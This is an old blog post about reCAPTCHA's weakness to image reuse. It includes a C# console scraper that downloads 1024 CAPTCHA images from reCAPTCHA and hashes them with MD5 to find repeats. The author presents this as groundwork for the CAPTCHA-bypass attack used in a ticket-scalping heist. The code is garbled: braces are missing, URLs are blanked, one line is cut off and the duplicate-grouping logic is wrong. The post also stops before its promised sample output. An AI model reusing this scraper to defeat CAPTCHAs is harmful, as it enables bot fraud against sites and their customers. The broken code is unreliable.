This site is soon to be deprecated by

Tuesday, March 2, 2010

Scraping - reCAPTCHA Hack

After reading about the $25 million online ticket heist and the involvement of the reCAPTCHA service I decided to see if the reported flaw was still present. From the article:

[The perpetrators] wrote a script that impersonated users trying to access Facebook, and downloaded hundreds of thousands of possible CAPTCHA challenges from reCAPTCHA. They identified the file ID of each CAPTCHA challenge and created a database of CAPTCHA “answers” to correspond to each ID. The bot would then identify the file ID of a challenge at Ticketmaster and feed back the corresponding answer.

If the writer was referring to the ID passed to via query string, the vulnerability appears to be fixed as the ID is temporary. However, the images are still the same and through the use of a cryptographic hash function such as MD5 we can identify duplicates. The following C# console application downloads a number (specified by the imageCount variable) of CAPTCHA images from reCAPTCHA, hashes each, groups the results by hash, then writes the results to a text file. Downloading as few as 1024 images can yield several identical images. Building on this one could potentially pull off the reCAPTCHA attack described in the article.

using System;
using System.Text;
using System.Text.RegularExpressions;
using System.IO;
using System.Net;
using System.Collections.Generic;
using System.Security.Cryptography;

namespace reCAPTCHAScrape
class Program
static string Request(string Url)
HttpWebRequest request = WebRequest.Create(Url) as HttpWebRequest;

string s;

using (StreamReader reader =
new StreamReader(request.GetResponse().GetResponseStream()))
s = reader.ReadToEnd();

return s;

static void GetCaptchaImage(int FileNum)
Regex scriptURLRegex =
new Regex(@"<script\s*type\s*=\s*""text/javascript""\s*" +

Regex scriptRegex = new Regex(@"challenge\s*:\s*'([^']+)'");

string pageURL = "";

string resp = Request(pageURL);

string scriptURL = scriptURLRegex.Match(resp).Groups[1].Value;

resp = Request(scriptURL);

string ID = scriptRegex.Match(resp).Groups[1].Value;

string imageURL = "" + ID;

HttpWebRequest request =
WebRequest.Create(imageURL) as HttpWebRequest;

byte[] buffer = new byte[1048576];

using (Stream s = request.GetResponse().GetResponseStream())
int len = s.Read(buffer, 0, 1048576);

Array.Resize(ref buffer, len);

using (FileStream stream = File.Create(FileNum + ".jpg"))
stream.Write(buffer, 0, buffer.Length);

static void DigestImages(string Path)
DirectoryInfo info = new DirectoryInfo(Path);

FileInfo[] files = info.GetFiles("*.jpg");

MD5CryptoServiceProvider md5 = new MD5CryptoServiceProvider();

Dictionary<string, List<FileInfo>> digestDictionary =
new Dictionary<string, List<FileInfo>>();

foreach (FileInfo f in files)
byte[] buffer = File.ReadAllBytes(f.FullName);

byte[] digest = md5.ComputeHash(buffer);

StringBuilder hexStringBuilder = new StringBuilder();

foreach (byte b in digest)
16).PadLeft(2, '0'));

string hexString = hexStringBuilder.ToString();

if (digestDictionary.ContainsKey(hexString))
digestDictionary.Add(hexString, new List<FileInfo>() { f });

StringBuilder results = new StringBuilder();

foreach (string s in digestDictionary.Keys)

foreach (FileInfo f in digestDictionary[s])


string filename = @".\Results_" + Environment.TickCount + ".txt";

File.WriteAllText(filename, results.ToString());

static void Main(string[] args)
const int imageCount = 1024;

Console.Write("Downloading images");

for (int i = 0; i < imageCount; i++)

catch (System.Exception ex)

Console.WriteLine("\r\nSearching for matches...");


Console.WriteLine("Complete. Press any key to continue...");

A match in the output looks like this: